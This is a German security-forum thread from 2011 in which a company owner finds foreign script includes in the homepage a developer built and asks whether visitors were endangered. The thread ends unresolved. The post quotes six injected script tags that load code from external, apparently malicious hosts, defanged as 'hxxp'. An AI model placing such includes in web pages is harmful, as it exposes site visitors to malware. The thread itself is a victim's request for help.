Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Eigene Website sendet Daten an andere Url`s

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 14.04.2011, 16:19   #1
Vollpfosten8
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Hi Leute,

wir haben uns von einem Webentwickler eine Firmenhomepage gestalten lassen, die noch nicht produktiv im Einsatz ist. Seit ein paar Tagen fällt mir auf, dass während man die Startseite betritt, Daten an weitere Url`s gesendet werden.
Der Aufbau dauert etwas länger als bei allen anderen Seiten und in der Statusleiste unten links steht immer "Warten auf..." und dann die fremden Url`s.
Habe daraufhin mir selbst mir die Index.html angesehen und folgende script includierungen gefunden:

<script type="text/javascript" src="hxxp://kityn.kiev.ua/js.php"></script>
<script type="text/javascript" src="hxxp://testzone.saturn.tj/js.php"></script>
<script type="text/javascript" src="hxxp://harikatatil.com/search.php"></script>
<script type="text/javascript" src="hxxp://steelborder.com/swfobject.js"></script>
<script type="text/javascript" src="hxxp://optimistbenin.com/search.php"></script>
<script type="text/javascript" src="hxxp://sieuthitructuyen.com.vn/swfobject.js">

Ich habe anschließend sofort den Entwickler verständigt und habe gerade Info bekommen, dass er den Trojaner Win32:Zbot-NAL im System hatte.

Und nun meine Fragen.
1. Hängt das eine mit dem anderem zusammen und
2. bestand hier eine Gefahr für alle PC´s die diese Seite besuchten?

Ich hoffe Ihr könnt mir schnell helfen, denn hier gehts um Firmen PC´s die diese Seite besucht hatten.


Schonmal herzlichen Dank & Gruß

Vollpfosten

Alt 14.04.2011, 16:31   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Zitat:
wir haben uns von einem Webentwickler eine Firmenhomepage gestalten lassen
Dann frag mal den Webentwickler wie er Absicherungen gestaltet hat, welches CMS dahinter steckt etc.
Wenn er die Seite pflegt sollte die Sicherheit auch seine Aufgabe sein - oder wurde was anderes vereinbart (Pflichtenheft etc.)?
__________________

__________________

Alt 14.04.2011, 16:36   #3
Vollpfosten8
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Hi Arne,

die weitere Pflege will ich selbst übernehmen.
CMS wird nicht verwendet.

Der Entwickler meinte ich solle erstmal nur das Passwort des FTP-Zugangs ändern. Was ich natürlich sofort gemacht habe.

Der Entwickler weiß selbst noch nicht was diese Javascript Dateien angerichtet haben.


Gruß

Vollpfosten
__________________

Alt 14.04.2011, 16:39   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Ich werd mir die Links nachher mal genau ansehen...
__________________
"Die Wahrheit ist normalerweise nur eine Entschuldigung für einen Mangel an Fantasie." (Elim Garak)

Das Trojaner-Board unterstützen
Warum Linux besser als Windows ist!

Alt 19.04.2011, 00:02   #5
Vollpfosten8
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Kann mir denn niemand weiter helfen?


Alt 19.04.2011, 20:17   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Eigene Website sendet Daten an andere Url`s - Standard

Eigene Website sendet Daten an andere Url`s



Hat sich in der Zwischenzeit was neues ergeben?
__________________
--> Eigene Website sendet Daten an andere Url`s

Antwort

Themen zu Eigene Website sendet Daten an andere Url`s
anderen, aufbau, daten, folge, folgende, frage, fremde, fremden, gefahr, gesendet, gestalten, homepage, hängt, leute, links, länger, schnell, script, seite, seiten, startseite, system, trojaner, win, win32, win32:zbot nal



Ähnliche Themen: Eigene Website sendet Daten an andere Url`s


  1. Warum sendet Windows 10 Daten an das Britische Verteidigungsministerium?
    Überwachung, Datenschutz und Spam - 01.09.2015 (13)
  2. Eigene Website mit unerwünschten Werbung/Befragung
    Log-Analyse und Auswertung - 15.01.2015 (1)
  3. Eigene Website (Blog) wird von Avast Anti Virus blockiert (Infektion: URL:MAL)
    Plagegeister aller Art und deren Bekämpfung - 18.09.2013 (5)
  4. Trojaner über eigene Website - alles probiert, Problem nach wie vor
    Plagegeister aller Art und deren Bekämpfung - 06.08.2012 (28)
  5. PC empfängt bzw. sendet permanent Daten
    Plagegeister aller Art und deren Bekämpfung - 02.11.2010 (7)
  6. Eigentor von Symantec: Eigene WM-Website voller Spam-Kommentare [Update]
    Nachrichten - 10.07.2010 (0)
  7. Eigentor von Symantec: Eigene WM-Website voller Spam-Kommentare
    Nachrichten - 09.07.2010 (0)
  8. PC sendet ständig Daten ins Internet
    Mülltonne - 29.11.2008 (0)
  9. PC sendet ständig Daten
    Mülltonne - 29.11.2008 (0)
  10. Pc sendet permanent Daten
    Plagegeister aller Art und deren Bekämpfung - 04.12.2007 (5)
  11. DSL Modem sendet oder empfängt STÄNDIG Daten!
    Log-Analyse und Auswertung - 31.10.2007 (15)
  12. Eigene Website
    Alles rund um Windows - 15.06.2007 (15)
  13. Rechner sendet permanent Daten ins Internet
    Plagegeister aller Art und deren Bekämpfung - 26.08.2006 (6)
  14. Zone Alarm sendet Daten
    Antiviren-, Firewall- und andere Schutzprogramme - 14.08.2006 (4)
  15. Winlogon.exe sendet ständig daten ins inet!
    Plagegeister aller Art und deren Bekämpfung - 19.01.2006 (1)
  16. PC sendet auf eigene Faust!!!
    Plagegeister aller Art und deren Bekämpfung - 31.01.2005 (2)

Zum Thema Eigene Website sendet Daten an andere Url`s - Hi Leute, wir haben uns von einem Webentwickler eine Firmenhomepage gestalten lassen, die noch nicht produktiv im Einsatz ist. Seit ein paar Tagen fällt mir auf, dass während man die - Eigene Website sendet Daten an andere Url`s...
Archiv
Du betrachtest: Eigene Website sendet Daten an andere Url`s auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.